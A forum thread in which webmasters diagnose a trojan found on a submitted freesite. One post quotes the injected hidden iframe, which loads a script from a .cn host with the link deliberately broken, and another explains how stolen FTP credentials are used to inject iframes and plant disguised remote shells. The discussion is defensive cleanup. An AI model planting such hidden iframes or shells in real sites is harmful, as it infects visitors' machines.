Trojan on freesite

[hincapie]

I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/

Take care

[Wazza]

It is the main page that is the issue

Contains the following

Code:

iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden"

The wms ref code is

slavesinlove.com/cgi-bin/click.cgi?id=dejavu

I know I've seen dejavu before...

[cd34]

iframe after <body> -- ftp account was most likely compromised.

[Wazza]

Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...

[nate]

Quote:

ftp account was most likely compromised.

you say that a lot. why so?

[cd34]

Quote:

Originally Posted by nate

you say that a lot. why so?

There are a few types of exploits that are out there. A web exploit or an FTP exploit are the two most common.

With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace <body> with <body><script exploit code> or <body><iframe exploit code>. Within a few hours, that cluster of servers will have modified as many pages as they can. Other machines in there will try to determine actual usable URLs and will inject remote shells that mimic existing files. You might have DSC003049.jpg in a directory and the exploit server might inject DSC003049.php. Those urls are then cataloged for later attempts at spam & DDOS work.

Most web exploits don't modify dozens of files and usually just inject a script that allows remote access. Usually it is modification of a template or file so that they can later run remote shells or scripts, or, depending on the hole in the application, they may upload files into directories for later use. Not to say that they couldn't modify a number of files, it depends on how the server is set up.

If the host runs setuid or suexec, a compromised web script runs as the same userid as the FTP account and therefore all files can be modified. With FTP, you're almost guaranteed that every file you can see in FTP can be modified. From a return on investment standpoint, with an FTP account you are more likely to have more pages modified. More pages means more surfers potentially exploited which means more zombies/toolbars/etc.

However, the exploit listed above has about a 99% chance of being from an exploited FTP password.

[dejavu]

Hello 2all!
Thanks for alert, this is really trojan at the my server!
I have been delete from this page and change FTP information...
I will find this code also at pages now and clean
Thanks

[dejavu]

All fixed and iframes removed from the server.
Thanks again...

[stuveltje]

ah so that was a trojan?, my puter freezed when i was checking your site on the main page, dejavu..nothing further happend, the page frooze i could close it and go further without rebooting, seems i finally have the right stuf to protect myself. oh and yeah it was an reason to reject your site, but i didnt blacklist it